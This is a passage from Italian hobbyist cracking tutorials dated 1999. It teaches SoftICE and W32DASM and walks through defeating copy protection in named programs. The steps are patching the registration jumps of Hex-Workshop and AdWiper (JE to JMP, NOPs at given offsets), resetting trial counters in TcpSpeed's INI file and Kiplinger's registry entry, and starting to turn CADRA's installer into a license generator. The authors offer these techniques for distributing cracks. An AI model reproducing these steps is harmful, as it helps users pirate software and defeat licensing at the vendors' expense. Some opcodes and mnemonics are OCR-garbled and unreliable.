l'esecuzione del debugger non potrete interagire con Windows, la prima 
cosa da fare è ottimizzare la finestra, per farlo potrete scaricare qui il 
mio file "winice.dat" e sostituirlo al vostro, oppure potrete scrivere 
sempre in softice questi comandi: line 60 invio 

wl invio 

wc 45 invio 

code on invio 

Wr invio 

faults off invio 
Se non vorrete scrivere tutto questo ogni volta che riavviate windows vi 
consiglio di scaricare il mio file oppure di modificare il vostro, sull 
l'ottimizzazione e l'uso di Softice dedicherò il mio prossimo tutorial. 
Torniamo a noi, come si inizia a sbirciare il codice? 
E' semplicissimo, per prima cosa dovete identificare un possibile punto 
d'attacco, ma noi questo l'abbiamo già fatto (mi riferisco al box che 
chiede il serial number), poi dovete scoprire quale funzione utilizza il 
prg per prelevare il testo dall'edit box, cercherò di essere più chiaro; 
allora, quando scriviamo un numero e premiamo "Register" il programma 
và a "guardare" ciò che è stato scritto, confronta quel risultato con 
quello reale e se sono uguali procede alla registrazione, per carpire il 
testo si usa in genere una funzione chiamata "GetWindowTextA", la "A" 
finale stà ad indicare che la funzione presa in considerazione è quella a 
32-bit e non a 16. 
Come si fà a sapere se un prog. usa una funzione oppure un'altra? 
Per scoprirlo possiamo fare due cose: andare a tentoni oppure cliccare 
col pulsante destro del topo sul file e andare su anteprima (se non c'è si 
deve installare e si trova sul cd di windows), apparirà tutta una lista 
delle funzioni che utilizza. 
Ma andiamo a registrare il prg, premiamo ctrl+d (da ora in poi scriverò 
ND) e scriviamo: bpx getwindowtexta. 
AA 
Ma cosa significa questo oscuro comando? 
Bhè vediamolo: bpx significa breakpoint on execution e getwindowtexta 
è la funzione sulla quale vogliamo brekkare, in parole povere non 


facciamo altro che chiedere a Sice di generare un'interruzione (che farà 
apparire la schermata del debugger) quando Hex-Workshop giunge su 
quella funzione, in pratica il breakpoint è una "trappola" che useremo 
praticamente sempre per fare ingresso nel codice di qualunque prg. 
Tanto per capirci possiamo dire che spesso useremo l'istruzionebpx 
messageboxA per far poppare Sice quando ci viene mandato il box con 
su scritto: Insert the correct password.....The number is incorrect 


Se avete problemi o non avete capito qualcosa scrivetemi ed io 
cercherò di aiutarvi. 

AA 

Premiamo invio e poi scriviamo X oppure premiamo F5 per tornare a 
win. A questo punto utilizziamo un cosidetto dummy number, cioè un 
numero che utilzzeremo spesso come "fake number", io uso sempre 
666111666, inseriamo quindi questo numero nell box e premiamo ok! 
Come speravamo vediamo Softice che fa la sua comparsa, adesso ci 
saranno una serie di numeri e scritte probabilmente incomprensibili, 
non vi preoccupate perchè presto impareremo a conoscerle. 

Premiamo una volta F11 (serve per tornare da una chiamata ad una 
routine), 3 volte F12 (questo comando esegue una funzione finchè non 
trova l'istruzione "RET" che significa return),, 22 volte F10 (questo serve 
per fare single-step in una funzione, in pratica con F10 si procede passo 
passo nel codice) 

e scriviamo: r fl z. 

AA 

Riassumiamo il tutto: 

F12: Esegue una funzione finchè non trova un'istruzione di ritorno 

F11: Torna da una chiamata alla rispettiva routine 

F10: Esegue ogni singola istruzione, in questo modo procediamo passo 
passo nel codice. 

F8: Esegue semplicemente un'istruzione, viene in genere usato per 
seguire qualche chiamata (CALL) importante. 

Una volta che saremo nel codice premeremo quasi sempre F11 come 
primo tasto e poi a seconda dei casi utilizzeremo F12 e F10. 

F5: Torna a Winzoz. 

r fl z: Questa istruzione è parecchio importante ed userò un breve 
esempio per spiegarla: quando la barra bianca del debugger passa su un 
jump (sono tutti jump quelle istruzioni che iniziano con la "J" come 
JMP, JNE, JAE, JB, JC...) sulla destra appare una scritta del tipo: 
"JUMP" oppure "NO JUMP", bene, con questa istruzione cambiamo il 
valore del flag Z, cioè trasformiamo la scritta "JUMP" in "NO JUMP" e 
viceversa, tutto ciò è molto utile nel caso che ci sia un salto dopo 
un'istruzione che controlla l'esattezza di un numero seriale (cioè la 
funzione salta se il seriale è esatto oppure non salta e ci manda il 
messaggio di errore), infatti con r fl z potremmo costringere la funzione 


a saltare e quindi anche a registrare il prg....;)) 
AA 


Premiamo F5 (scriviamo un user name e una company a piacere) e 
possiamo felicemente constatare che il programma è stato registrato. 
Adesso vi spiegherò il codice che avete visto cosa significava. 

Dopo aver premuto tutti quei tasti vi siete trovati davanti a delle righe 
simili a queste: 

Attenzione i numeri prima dei due punti non sono stati inseriti poichè i 
vostri saranno sicuramente diversi. Ricordate anche che le istruzioni JZ 
(jump if zero) e JE (jump if equal) oppure JNZ (jump if not zero) e JNE 


(jump if not equal) sono equivalenti e che il W32DASM sostituisce 
sempre JZ con JE e JNZ con JNE. 

# significa: "numero" quindi #3 è = a "numero 3" 

:0042625B E8CC4E0200 call 0044B12C 

:00426260 8B8DFCFEFFFF mov ecx, dword ptr [|ebp+FFFFFEFC] 


:00426266 83C164 add ecx, 00000064 
:00426269 E812BAFDFF call 00401C80 
:0042626E 50 push eax 

:0042626F 8D45DC lea eax, dword ptr [ebp-24] 
:00426272 50 push eax 

:00426273 E8C82D0100 call 00439040 

:00426278 83C408 add esp, 00000008 
:0042627B 68E8F74700 push 0047F7E8 
:00426280 8D45DC lea eax, dword ptr [ebp-24] 
:00426283 50 push eax 

:00426284 E867450100 call 0043A7F0 

:00426289 83C408 add esp, 00000008 
:0042628C 85C0 test eax, eax<--- controlla il # vero con 
il nostro 


:0042628E 0F8414000000 je 004262B3<-- se il # è vero salta a 
004262A8 (ricordate l'esempio dell'istruzione "r fl z" ?) 


:00426294 8D45DC lea eax, dword ptr [ebp-24] 
:00426297 50 push eax 

:00426298 E823110100 call 004373C0 

:0042629D 83C404 add esp, 00000004 

:004262A0 8945EC mov dword ptr [ebp-14], eax 
:004262A3 E907000000 jmp 004262AF 

:004262AF 837DEC00 cmp dword ptr [ebp-14], 00000000 


:004262B3 0F8479000000 je 00426332<--ricontrollalo e registra se 
vero 

:004262B9 8B8DFCFEFFFF mov ecx, dword ptr [ebp+FFFFFEFC] 
:004262BF 83C164 add ecx, 00000064 


Bene bene, vediamo cosa abbiamo fatto: immaginate un omino che di 
mestiere fa il corridore, qualcuno (la funzione) gli dice dove deve 
andare, gli dà un foglio con un numero (666111666) e gli dice anche di 
seguire le indicazioni, l'omino parte e trova una lettera, la apre e 
controlla (test eax, eax) il suo numero con quello della busta, un 
indicazione (je 004262B3) gli dice di saltare ad un altro pezzo di strada 
se il suo numero è uguale a quello della busta, nel nostro caso l'omino 
continua a correre finchè non incontra un'altra indicazione (cmp dword 
ptr....., 00000000) che gli dice dice di controllare "SE" il suo numero è 
sbagliato, se non lo è un'altra indicazione (je 00426332) gli comunica 
che può arrivare al traguardo usando qualche scorciatoia (va bene così 
aLoNg3x? ;) ), questa spiegazione credo sia stata più facile da capire. 
Potremmo riassumere la storia dell'omino in questo modo: il corridore 
arrivato al segnale je 00426332 (je= jz e jz= jump if zero) è stato 
gabbato da un furfantello (io il cracker) che ho cambiato 
momentaneamente le lettere trasformando "je" in "jmp" cioè jump, che 
significa: "Qualunque numero hai prendi una scorciatoia!" 

Bello ehh? Si, un'ultima cosa e poi vi faccio riposare: il comando "r fl z" 
cambia solo momentaneamente il valore del flag, in pratica solo fino al 
riavvio del programma, se volessimo diffondere un crack, dovremmo 
creare un file che cambi il "je" in "jmp" ciò può essere fatto anche con 
l'editor esadecimale (ma nel nostro caso non è necessario) vi spiegherò 
tutte le tecniche nei prossimi tutorial. 


Ciao e buon crack a tutti. 

Piccola nota: 
In genere tutti i prog. hanno un # check all'avvio, in pratica controllano che il numero 
di registrazione sia esatto, questo serve ad evitare che chiunque possa inserire un 
numero qualsiasi e registare il prg. 
Hex-Workshop a registrazione esatta crea un file di registro (Hexworks.reg) dove 


inserisce tutte le informazioni, il file assume questa forma: 
e e ie e e e e e e e e e e e e e e e e e e e e e e e e e e e e e e e e e e AAA AAA 


* 666111666 Quequero È 
» CrackZ Corp. * 
li Kî°Ò * 


e ie e e e e e ie e e e e e e e e e e e e e e e e e e e e e e e A A AAA 
Ovviamente asterischi esclusi!!! 
Una volta creato il file il prg non mostra più la scritta "Unregistered" ne il pulsante di 


registrazione "Demo Version". 
Quequero 


Vorrei ringraziare aLoNg3x per avermi 
dato acluni consigli su questo tute... 


Tutorial N°3 16-2-1999 

Impariamo ad usare SoftICE 

In questo tutorial impareremo ad usare SoftICE, conosceremo l'uso delle 
varie funzioni ed impareremo anche a modificare il codice di un 


programma. 


SoftICE 
Come abbiamo già detto SoftICE ci mostra il codice assembler di un 


programma, noi poi per scraccherellare il tutto abbiamo bisogno sia di 
conoscere l'Assembly, sia di saper usare il debugger, infatti come 
potremmo guidare una macchina senza conoscere il codice stradale e 
senza avere la patente? 

Uno dei comandi che useremo più spesso sarà sicuramente "bpx" cioè 
breakpoint on execution che in pratica fa poppare Sice quando per 
esempio viene eseguita una funzione (GetWindowTextA, 
GetDlgItemTextA, MessageboxA ecc...) ma ovviamente ne esistono altri 
come per esempio: 


bmp: breakpoint su un accesso alla memoria (possiamo utilizzarlo per 
vedere se una funzione legge o scrive su un determinato indirizzo) 


bpr: bp (breakpoint) su un rango di memoria 
bpio: bp su un accesso I/O 
bpint: bp su un interrupt 


bmsg: bp su un messaggio (lo useremo per brekkare su funzioni come 
WM_GETTEXT). 
Per maggiori informazioni sui breakpoint vi rimando a questo tutorial. 


Task: Questo comando visualizza tutti i processi attivi, viene in genere 
utilizzato in combinazione con Hwnd. 


Hwnd: Mostra l'handle delle finestre di un determinato programma. 
Ora vi spiegherò meglio come utilizzare questo comando insieme a 
bmsg. 
Per prima cosa scegliete un programma vittima (io userò 
Hex-Workshop), avviatelo ed aprite la finestra di registrazione, avviate 
Sice (AD) e scrivete task per vedere con quale nome gira sotto Winzoz 
l'H-Workshop. 
Il nome che appare per primo e che sembra essere l'unico possibile è: 
Hworks32. 
Bene bene, scriviamo: Hwnd Hworks32 e premiamo invio. 
Vedrete adesso molte scritte, noi vogliamo cercare l'handle della casella 
di testo nella quale dobbiamo scrivere il numero seriale, ma come si fà? 
Bhè l'unico modo che io conosca è scriversi tutti gli handle (prima 
colonna a sinistra) che presentano l'attributo edit nella colonna 
class-name (la 4° da sinistra) e poi provarli uno ad uno scrivendo: bmsg 
xXxx (qui va inserito un handle) wm_gettext, ecco un esempio: task 
hwnd hworks32 
bmsg 01A5C wm_gettext. 
Una volta trovato quello giusto Sice popperà dopo aver premuto il 
pulsante di registrazione. 


bd*: Disabilita tutti i bp può essere sostituito p.e. con bd00 (disabilita il 
1° bp) 


be*: Abilita tutti i bp il resto è uguale a "bd" 


bl: Llista tutti i bp che stiamo utilizzando se appare un "*" il bp è 
disabilitato 


bc*: Cancella tutti i bp la sintassi e come bp e be 


bh: Ci dice tutti i bp che abbiamo usato dall'accensione del pc (molto 
utile) 


?: p.e. "? eax" ci dice quale valore esadecimale, decimale ed ASCII 
contiene eax 


d: "d eax" dump eax, ci fà vedere il suo indirizzo esadecimale (difficile 
da dire a parole) 


code on-off: fà apparire il codice esadecimale di fianco alle istruzioni, 


ecco un esempio: 015F:00425867 JNZ 00425921 
<------- code off 
015F:00425867 751E JINZ 00425921  <------ code on 
|--|<------- codice esadecimale 


cercate di tenere questa istruzione sempre abilitata perchè molto 
importante, ora mi spiegherò meglio: se vogliamo cambiare un JNZ 
00425921 in JMP 00425921 dovremmo aprire l'eseguibile con l'editor 
esadecimale, cercare 751E e cambiarlo in EB1E, infatti EB significa JMP 
e 1E significa 00425921, nelle prossime pagine vi mostrerò una tabella 
con quasi tutti i valori esadecimali delle varie istruzioni, dovrete 
ricordare sempre che gli ultimi due caratteri (funziona solo per le 
istruzioni semplici a 4 caratteri, le altre cambiano) di ogni valore 
indicano l'indirizzo o il registro a cui si riferiscono, quindi dovrete 
cambiare solo i primi due e non gli ultimi a meno che non vogliate 
cambiare la direzione del salto oppure il nome del registro. P.E. il 

valore 85D2 significa: TEST EDX, EDX (ricordate questa istruzione? se no 
andate al tute N°2) però se lo cambiamo in 85F6 diventerà: TEST ESI, 
ESI, avete capito? 


a (address) : "a 015F:00425867" ci permette di cambiare ciò che si trova 
all'indirizzo 015F:00425867, una volta premuto invio potremo scrivere 
per esempio: TEST EAX, EAX così il jnz verrà cambiato in test... 


e (address): edit address, con questa funzione non possiamo cambiare 
le lettere come con "a 015F:00425867" ma dobbiamo agire sui valori 
esadecimali. Una volta premuto invio apprirà una finestra che mostra i 
valori, noi andremo a prendere i primi 4 caratteri "751E" ed andremo a 
scrivere "EB1E", vorrei ricordare che tutti i cambiamenti fatti dal 
debugger funzionano solo fino a che si riavvia il prog, dopodichè va 
tutto a farsi benedire. 


Funzioni: 


Visual Basic 
_ Vbastremp,__vbastrcomp: Queste istruzioni vengono usate in VB per 
far comparire le stringhe (non chiedetemi nulla a riguardo visto che non 
conosco per niente il VB). Per usarle si deve mettere un bp su una delle 
due, inserire un numero nel box di registrazione, premere ok, aspettare 
Sice e prima di premere F11 si vede cos'è stato messo nello stack. Si 
esamina un registro (in genere EBP) in questo modo: dd ebp 
e si controllano gli ultimi 8 valori con questo comando: d xxxxxxxx 
si potrebbe anche trovare un seriale ;)))) 


__vbaR$Str: non ne sono sicuro ma dovrebbe essere l'equivalente di 
GetWindowTextA. 


rtemsgbox: Questo è MessageboxA in VB 


C/C++ 
GetPrivateProfileStringA à Legge il file .INI dove spesso viene 
registrato il seriale, questa funzione si usa per disabilitare il number 
check all'avvio del programma. 


GetWindowTextA à L'abbiamo già usata, comunque serve a copiare ciò 
che si trva nelle caselle di testo. 


GetDlgItemTextA à Praticamente ugule alla precedente. 


hmemcpyà Questa funzione grabba i tasti premuti sulla tastiera e puo essere 
sfruttata a nostro vantaggio nei sistemi di protezione che non utilizzano funzioni 
standard (GetWindowTextA, GetDlgItemInt, MessageBoxA ecc...) oppure in quei 
sistemi che abilitano il pulsante di registrazione solo se il codice è esatto, questo 
breakpoint funzioni infatti ogni volta che noi premiamo un tasto..bello vero? 

Per ora altri comandi non mi vengono in mente. 


MessageBoxA à Fà apparire un box di messaggio, la possiamo usare per 
entrare nel codice del programma dopo la "Beggar off" cioè il messaggio 
che ci dice che abbiamo sbagliato il seriale ecc.... 


GetSystemTime à Vede l'ora del sistema e si usa nei programmi che 
scadono dopo un'ora, due ore ecc....Per utilizzarla basta mettere un bp 
su di essa ed avviare il programma. 


GetLocalTime à Controlla l'ora, il giorno ed il mese. Si usa nei 
programmi a scadenza di 30, 60, 90 gg ecc....Funziona come la 
precedente. 


SetTickCount à Da quello che ho potuto vedere la funz. viene usata 
spesso per vedere negli shareware quanti giorni mancano all'espirazione 
del prog. 


Cambiamo il codice al programma 


Dopo aver scraccherellato per benino il nostro prog e dobbiamo 
cambiare qualche byte al programma è necessario sapere come 
cambiare le varie istruzioni, supponiamo di avere un pezzo di codice 
simile a questo e vediamo come ci dobbiamo comportare... 


:004010CE 8B06 mov eax, dword ptr [esi] 
:004010D0 85C0 test eax, eax 

:004010D2 7409 je 004010DD 
:004010D4 40 inc eax 


:004010D5 E8E6EB0000 call 0040FCCO 

:004010DA 83C404 add esp, 00000004 
A---codice A---istruzioni 
esadecimale 


Il nostro crack consiste nel cambiare jE 004010DD in JMP 004010DD, per 
farlo avremo bisogno di cercare quel pezzo di codice esadecimale 


all'interno dell'H-Workshop. Prendiamo nota di qualche numero prima e 
dopo del salto come ad esempio 85c0740940E8E6, clicchiamo sul 
pulsante "find" ed inseriamo quei numeri, il nostro bersaglio è il num. 
7409 e per cambiarlo in jmp basterà prendere dalla tabella qui sotto i 
primi due numeri dell'istruzione JMP e mantenere integri i secondi due, 
così facendo sostituiremo l'istruzione 7409 in EB09 (vorrei dire che se 
nel codice del debugger doveste trovare un jump che abbia più di 4 

cifre esadecimali allora dovrete usare il comando a xxxxxxxx, fare i 
cambiamenti a mano e vedere cosa appare in Sice, segnarlo ed andarlo a 
cambiare nell'editor). 

E se il nostro crack avesse richiesto l'eliminazione dell'istruzione inc 
eax? 

In questo caso bastava cercare la solita stringa e cambiare il 40 con 90, 
questo numero equivale all'istruzione NOP, cioè No Operation, significa 
che lì non deve succedere nulla e si deve passare oltre. 

Se vi capitasse di dover cancellare un'istruzione o di dover lasciare spazi 
vuoti (p.e. se 68c88c deve diventare un jmp non potrete mai scrivere 
ebc88c) ricordate di sostituirli SEMPRE con un NOP. 

Se per caso non siete sicuri di qualche cambiamento vi ripeto di provare 
prima con a xXXXXxxx. 


Comando 
Effetto 
Comando 
Effetto 
EBXX0 
JMP 
33XX 
XOR XXX, XXX 
75XX 
JINZ 
77XX 
JA 
7CXX 
JL 
76XX 
JBE 
7EXX 
JLE 
C3 
RET 
7DXX 
JGE 
FFFF 
INVALID 
7FXX 
JG 
0000 
ADD [EAX], AL 
73XX 
JAE 
85XX 
TEST XXX, XXX 
74XX 
JE/JZ 


OBXX 


OR XXX, XXX 
F4 
HLT 
90 
NOP 


Quequero 
Passiamo ora al 4° tutorial dove craccheremo un prog facile facile 
ed impareremo a "patchare" il prog. 


Il nostro 2° crack 


Eccomi di nuovo qui a scrivere un altro tute, scusate la mia assenza ma 
sono stato estremamente impegnato e poi ho dovuto cercare un prog 
molto facile da craccare, questa volta parleremo di AdWiper v1.02, 
questo proggy non fa altro che velocizzare la connessione eliminando 
tutti quei noiosi banner. 

Lo potrete trovare qui. 

Iniziamo, per prima cosa installate il prog (mi sembra ovvio ;) ed 
apriamolo, vediamo subito un invitante bottone che ci chiede di 
registrare AdWiper (anche se a noi dice solo "crackami, cackami" ;), 
clickiamoci sopra e vediamo apparire un grazioso box che ci chiede un 
seriale....mmmmm bene. 

Vogliamo trovare il seriale? 

Non sia mai! Perchè sniffare il numero (che è da lamer) quando abbiamo 
le potenzialità di disabilitare il check? 

In realtà questa è la soluzione più semplice da attuare, ed è questa la 
strada che prenderemo. 


Apriamo il nostro fidato W32DASM, facciamogli disassemblare 
l'eseguibile, clickiamo sul secondo pulsante da sinistra (String Data 
Referencies) e vediamo di trovare qualche "clue" oppure la "Beggar off" 
cioè: Incorrect Password, Your number does not match, Number 
Incorrect ecc... Ci siamo capiti? 

Sulla prima riga leggiamo "Thank you for registering" azzzz buono, 
facciamo doppio click sulla scritta ed avremo davanti qualcosa del 
genere: 


* Referenced by a CALL at Address: 
|:00402787 


| 

:00401400 6AFF push FFFFFFFF 

:00401402 6891DF4100 push 0041DF91 

:00401407 64A100000000 mov eax, dword ptr fs:[00000000] 
:0040140D 50 push eax 

:0040140E 64892500000000 mov dword ptr fs:[00000000], esp 
:00401415 51 push ecx 

:00401416 8B442414 mov eax, dword ptr [esp+14] 

:0040141A 53 push ebx 

:0040141B 56 push esi 

:0040141C 57 push edi 

:0040141D 8BF1 mov esi, ecx 

:0040141F 50 push eax 

* Possible Reference to Dialog: DialogID_0066 

| 

* Possible Reference to String Resource ID=00102: "Thank you for 
Registering!" 


:00401420 6A66 push 00000066 

:00401422 89742414 mov dword ptr [esp+14], esi 
:00401426 E8EC110100 call 00412617 
:0040142B 8D7ESC lea edi, dword ptr [esi+5C] 


Mmmm questa cosa non mi piace, non vedo nè jump nè test nè altro, 
molto male, allora forse non va bene qui, cosa facciamo? 

Nulla, apriamo di nuovo SDR (String Data Referencies) e facciamo un 
altro doppio click sulla prima riga....dovremmo avere qualcosa del 
genere: 


:004021BB E890140000 call 00403650 

:004021C0 83C408 add esp, 00000008 

:004021C3 85C0 test eax, eax 

:004021C5 745F je 00402226 <----Ricordate il numero 745F ci servirà dopo 
* Possible Reference to Dialog: DialogID_0066 

| 

* Possible Reference to String Resource ID=00102: "Thank you for 
Registering!" 


| 

:004021C7 6A66 push 00000066 

:004021C9 8D4C240C lea ecx, dword ptr [esp+0C] 
:004021CD E8B6440100 call 00416688 
:004021D2 6A00 push 00000000 


Adesso va bene, come potete vedere all'indirizzo 004021C5 troviamo un 
bel "jump if equal", se la funzione in quel punto non salta si dovrebbe 


avere il messaggio di ringraziamento (ma che bravi questi 
programmatori, ci ringraziano anche se crackiamo i loro programmilli ;), 
provvediamo allora alla registrazione, dovrebbero bastare due semplici 
"nop" per registrare il prog, ma a questo punto come facciamo a 
cambiare i "connotati" all'adwiper? 

Nulla di più semplice: andiamo in W32DASM, facciamo doppio click 
sull'indirizzo del salto (004021C5) e se guardiamo in basso a destra 
dovremmo avere una scritta di questo genere: @Offset xxxxxxxxh, che 
nel bostro caso dovrebbe essere 000015C5h (la "h" sta a dire che si tratta 
di un numero esadecimale). 

Copiamo da qualche parte questo offset, apriamo l'Hex-Workshop, 
carichiamo AdWiper.exe ed andiamo in Edit[Go to..., inseriamo l'offset 
di prima e premiamo invio, ci troveremo davanti ad un ammasso di cifre 
esadecimali e guarda caso il cursore si ferma su un 7 seguito da un 4 un 
5 ed una F, in totale:745F, se andiamo a guardare in W32DASM, affianco 
all'istruzione JE 00402226 c'è scritto proprio 745F, ciò significa che 
questo è il codice esadecimale del salto, cavolo che carino.....adesso 

per patchare il prog dobbiamo sostituire questo numero con 9090 che 
significa (come dovreste sapere) nop nop, cioè la funzione arrivata in 
quel punto non fà nulla e passa oltre, cioè alla registrazione. 

Salviamo il file e quando ci viene chiesto di farne un backup diciamo di 
sì tanto per essere sicuri. 

Il prog ogni volta che veniva avviato controllava se era stato registrato e 
quindi faceva apparire il pulsante register... e cazzi vari, adesso come 
potrete felicemente constatare viene presentata all'inizio la scrittina 
"Thank you for Registering". 

Bhè ci vediamo al prossimo tutorial. 

Vorrei cogliere l'occasione di salutare alcuni cari amici come: 
NeuRaL_Noise, +Malattia, War-lock, Alor, Along3x, _GEnius, /Acourier, 
YanOrel, Killexx, d4emon, Insanity, EL_Diablo (e la sorella ;), T3x, 
KeRoUaC, Anubls, N6U5, Vecna e basta, se ho dimenticato qualcuno 
non l'ho fatto di proposito. 


Se volete contattarmi mi troverete spesso su IRCnet, fatemi una query. 


Alla prossima Quequero 


OVVero 
come si sputtanano le protezioni dei programmi senza essere veri crakkatori. 


Innanzitutto premetto che questo articolo non e' forse il classico articolo 

da SyStEmDoWhn, non e' approfondito, non e' fatto da un mago dell' H/C/P ma 
e' scritto da un ragazzo con una conoscenza media del PC e che ama divertirsi 
con esso. Quindi se ritenete cio' che ho scritto delle boiate assurde, voi 

grandi guru del crack, avete ragione!! Anzi diciamo cosi’, se siete veri 
crakkatori o gente gia' abbastanza esperta non leggetelo neanche!! 
Sfortunatamente non sono un crakkatore, sto cercando di diventarlo 

(grazie Xoanon per la guida !!) ma non lo sono ancora, questa mia storiella 

e' indirizzata a coloro che, a volte, nei canali IRC domandano crack per questo 
o quel programma e magari senza sapere cosa sono i file .INI o il Registro di 
Windows '95 o i files di installazione. 

A tutti puo' capitare di trovarsi di fronte ad un programma che, sfiga vuole, 
nessuno conosce, nessuno ha visto, nessuno possiede il crack relativo :(. 

Lo scopo di questo articolo e' far capire come, a volte, non serva parlare in 
assembler, non serva saper smanettare con il Soft-Ice o disassemblare col 
W32dasm per fottere un programma, basta un po' di intuizione e una dose 
massiccia di CULO. 

Ok, adesso vediamo tre esempi di come a volte e' facile aggirare 
(completamente o in parte) una protezione senza essere veri crakkatori : 

(I programmi molto probabilmente non vi saranno affatto familiari) 


Esempi: 


1) File .INI: TcpSpeed v1.01 
2) Registro di Win95: Kiplinger Small Business Attorney 
3) Files di Installazione: CADRA 


Iniziamo: 
1) File .INI: TcpSpeed v1.01 


Il programma TcpSpeed e' una piccola utility che permette di misurare la 
velocita' di collegamento con un sito che voi specificato. L'ho trovato 

su un sito H/C/P (boh chissa' perche') e non e' che mi abbia esaltato troppo 
infatti non funziona con tutti i siti ma solo con alcuni. 

Comunque vediamo che limitazione ha: 

senza dirvi nulla (o almeno nella mia versione non c'erano files che lo 
spiegavano) il programma vi permette di utilizzarlo solo 10 volte + o -, 

poi il maledetto cerca di collegarsi al suo server per cercare di registarsi. 
Allora vediamo un po' se ha un contatore, dovra' pur salvare da qualche parte 
il numero di avvii ? 

Ok allora si puo' cercarlo prima nei file .ini che e' la cosa piu' semplice; 
innanzitutto breve excursus sui file .ini (forse non tutti sanno cosa sono): 

i file .INI sono dei file di inizializzazione che contengono informazioni 
relative ad un programma, per esempio la posizione della finestra, gli ultimi 
file aperti, e guarda un po' a volte i contatori o le registrazioni. 

Si trovano nella directory di Win95 (ma a volte file con l'estensione .ini si 
possono trovare anche nelle directory dei programmi) ed hanno di solito lo 


stesso nome del programma relativo. 
Esistono anche dei file .INI relativi a Windows 95: 


WIN.INI dove si puo' trovare il tipo di stampante, lo sfondo, le impostazioni 
per l'italia etc... e magari informazioni sui programmi (es. WinZip) 


SYSTEM.INI dove ci sono i settaggi di sistema: tastiera, scheda video etc... 


Personalmente consiglio di controllarli sempre tutti, per essere sicuri, e 

di controllare anche tutti i file nella directory del programma (per vedere 
se salva il valore da qualche parte li' magari in un file con un nome cazzuto 
o nascosto). 


Con questo programmino ci va proprio alla grande, nel file Tcpspeed.ini 

c'e' proprio la linea Run Count= N. 

Provate ad avviare il programma 1 volta, riguardate il file .ini e troverete 

che e' cambiato in Run Count = N+1. Quando N = 10 il programma decide che lo 
avete provato abbastanza e non va piu'. 

Non fate altro che andare nella directory di Win95, aprite Tcpspeed.ini e 
modificate il contatore riportandolo a 0 ! 

Ovviamente e' una cosa un po' grezza e provvisoria ma sempre meglio di 

niente o no ? 

SUGGERIMENTO DA PARTE DI BLINKING: Il mio caro compare suggerisce di settare 
il file tcpspeed.ini READ ONLY cosicche' il programma non riesca a portare 
avanti il contatore !! 


2) Registro di Win95: Kiplinger Small Business Attorney 


Il suddetto programma non e' molto interessante per il mercato italiano ma 
ha comunque degli spunti interessanti; lo classificherei come un word 
processor che guida alla composizione di garanzie (non avvisi!!), lettere, 
accordi pre-matrimoniali, testamenti (tie'!!) etc.. 

Sfiga vuole che da dove l'ho recuperato non c'era il crack e penso di sapere 
perche' mancava: la prima volta che avviate lo SBA dopo l'installazione il 
programma parte tranquillamente, il problema e' che alla 2nda volta vi chiede 
di registrarlo e vi concede 3 avvii senza codice di registrazione (come mi 

fa incazzare la gente che distribuisce warez senza provare a fondo la roba!). 
Il controllo dei file .INI non porta da nessuna parte e adesso come si fa ? 


Con l'avvento di Windows '95 (evitiamo commenti sul sistema operativo), a 
detta di molti giornali, i file .INI sarebbero dovuti scomparire per lasciare 
spazio al fantomatico Registro di Configurazione. Effettivamente il numero 

di questi file si e' ridotto e, oggigiorno, accade spesso che i settaggi 

dei programmi siano messi tutti in questo Registro. 

Per chi non lo sapesse (e penso che ce ne siano) per vedere il registro basta 
digitare nella finestra Esegui... il comando Regedit e cosi' vi ritrovate 
nell'Editor del Registro di Configurazione. 

Adesso piazziamo una ricerca (Modifica..Trova) su Attorney e vediamo un po' 
che succede... 

Uhm sotto HKEY_CLASSES_ROOT mi ha trovato Kiplinger's Small Business Attorney 


diamoci una occhiata: premiamo sul + di fianco e compare la chiave frIndex 
clicchiamo su di essa e nella finestra di destra compare 

|ab| predefinito "N" 

dove N e' un numero 


Bene proviamo a rieseguire il programma, poi torniamo qui e scopriamo che 
N e' diventato N-1. La faccenda si fa interessante: proviamo a mettere 10 

e avviamo il programma, adesso dovrebbe dirci che ci sono rimasti 10 avvii ! 
E chissa' che succede se ci piazzo un bel 1000 ???? :)) 

Un altro programma fottuto. 


3) Files di Installazione: CADRA v10.0.1 per Windows 


E ora, con un po' di orgoglio (si ditemi pure che sono un esaltato ed uno 
spandi ma questa lavoretto mi fa godere come un porco) la mia Opera. 


Prima cosa: cusale' ] Cadra ? (trad. cos'e' il Cadra ?) 

(xoanon scrive in livornese e io in varesotto) 

Il Cadra e' un CAD (Computer Aid Design), cioe' un programma di disegno 
tecnico tipo AutoCad x intenderci, prodotto dall'Adra e venduto alla modica 
cifra di 10 zucche + o - (come ogni cad che si rispetti). 


Seconda cosa : sa te fe cuse' dun Cad che l'e' minga famus ? 
(trad. cosa te ne fai di un Cad che non e' famoso ?) 
Lo usa mio pa' al lavoro e volevo dargli una mano da casa. 


Terza cosa: che protezione ha ? 

Bella domanda !! 

Praticamente legge qualcosa dal Bios del PC, vede le opzioni del Programma 
che volete attivare e la data in cui scadra' la licenza, legge la chiave 

(nel formato XXX-XXXX) confronta il tutto e bum: la licenza che avete 
inserito e' scorretta. 


Quarta cosa: ma non potevi copiare la licenza di tuo padre? 
Eh no, così mi deludete ! 
Ho detto che legge dal Bios quindi ogni PC e' diverso dall'altro! 


Ed ora fottiamo questa protezione da 10 zucche! 

Osservando bene bene il setup si scopre che la licenza va configurata 

non all'interno del cad ma dal setup. Interessante... 

Vi e' mai capitato di dare una occhiata a quei file chiamati setup.Ist 

setup.inf e setup.mst? No? Male! Dovreste! Come dice mio nonno bisogna 

sempre OSSERVARE e CAPIRE il mondo attorno a noi! (Meditate gente Meditate) 
(non tutti i programmi li hanno, dipende dal tipo di installazione, quelli 

fatti con l'InstallShield no e sfortunatamente ora ne fanno tanti di setup 

con quello) 

Li illustro velocemente : 


Setup.lst : informazioni generali tipo titolo finestra, file necessari etc.. 
Setup.Inf : contiene l'elenco di tutti i file che verranno installati (io 
lo modifico quando copio un programma e voglio tagliarci dalla 


installazione magari 20Mb di Immagini inutili senza far impastare 
l'installazione) 

Setup.mst : il file veramente interessante, la sua descrizione presa dal file 
e' questa : 


Setup script for Cadra for Windows. Written in MSTEST Basic 
This code is rather tightly coupled to setup.dll 


Bene bene e' lo script di installazione scritto in una specie di Basic che 
contiene le info sulle procedure di installazione (tipo se schiaccio questo 
succede quest'altro). Attenzione la 2nda linea ci dice che il file e' 

accoppiato con il file setup.dll (Cio' e' importante perche' i messaggi che 
vengono visualizzati vengono presi dalla dll, io ho dovuto modificare 
brutalmente la DLL per far inserire i miei commenti nel setup trasformato in 
generatore di Licenze ma non e' importante per ottenere le licenze) 


Allora apriamo questo script e facciamo una ricerca con License, Register, 
Registration, Incorrect, Lic ,etc... 
Troviamo un po' di cose, con un po' di pazienza becchiamo la routine giusta: 


